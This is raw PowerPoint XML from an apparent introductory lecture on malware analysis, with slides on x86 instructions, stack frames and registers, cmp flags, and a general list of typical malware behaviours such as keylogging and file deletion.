                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>edx</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
                        <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>dec</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ecx</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
                        <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>mul</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> 0x50</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
                        <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>div 0x75</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
                        <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>xor</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
                        <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>shl</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, 2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
                        <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ror</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
                        <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>nop</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
                        <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4015319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behaviour</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Malware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>behaviour </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>usually to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Delete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>crucial files on a computer to render it unusable without a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>recovery process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>every keyboard input to see what the users type.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Steal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>personal or sensitive information or files from a computer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>a computer’s resources for the purpose of the malware, e.g. send </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>spam emails</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, DDoS another system, or brute-force encryption keys</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="189105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196752"/>
            <a:ext cx="5482952" cy="5112568"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>The Stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: LIFO structure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Local variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Flow control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Uses registers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>ESP: stack pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Address of the top of the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>EBP: base pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Keep track of the location of local variables and parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" dirty="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ush</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>pop, call, leave, enter, ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3000" dirty="0">
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5940152" y="2492896"/>
            <a:ext cx="2592288" cy="35283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6156176" y="3361398"/>
            <a:ext cx="216024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6131385" y="4257092"/>
            <a:ext cx="216024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146463" y="5144481"/>
            <a:ext cx="216024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6191715" y="3500768"/>
            <a:ext cx="2089162" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Current Stack Frame</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6164088" y="4396462"/>
            <a:ext cx="2053575" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Caller’s Stack Frame</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6106196" y="5283851"/>
            <a:ext cx="2210220" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Caller’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Caller’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Stack Frame</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6128501" y="2097361"/>
            <a:ext cx="2227341" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Low Memory Address</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6070034" y="6021288"/>
            <a:ext cx="2271519" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>High Memory Address</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13282328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b="1" dirty="0" smtClean="0"/>
              <a:t>Conditionals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: instructions that perform the comparison, i.e. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cmp</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Uses with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>flags ZF, CF, …</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813878655"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1475656" y="3140968"/>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GB" dirty="0" err="1" smtClean="0"/>
                        <a:t>Cmp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
                        <a:t>dst</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
                        <a:t>src</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>ZF</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>CF</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
                        <a:t>Dst</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t> = </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
                        <a:t>src</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>0</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
                        <a:t>Dst</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t> &lt; </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
                        <a:t>src</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>0</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
                        <a:t>Dst</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t> &gt; </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
                        <a:t>src</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r>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>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val="21318634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b="1" dirty="0" smtClean="0"/>
              <a:t>Branching</a:t>
            </a:r>
